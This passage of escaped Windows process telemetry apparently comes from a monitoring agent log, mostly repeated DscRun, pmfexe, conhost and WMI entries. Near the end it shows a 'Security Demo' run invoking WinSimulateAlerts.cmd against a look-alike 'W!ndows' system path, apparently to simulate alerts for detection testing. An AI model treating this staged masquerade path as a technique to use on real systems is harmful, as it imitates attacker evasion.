Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelper.exe\\\" -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\System32\\\\InstallAgent.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"NaN\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"NaN\",\"cmd.exe /c c:\\\\Diagnostics\\\\WinSimulateAlerts.cmd c:\\\\W!ndows\\\\System32 2\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Begin Security Demo tasks\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c 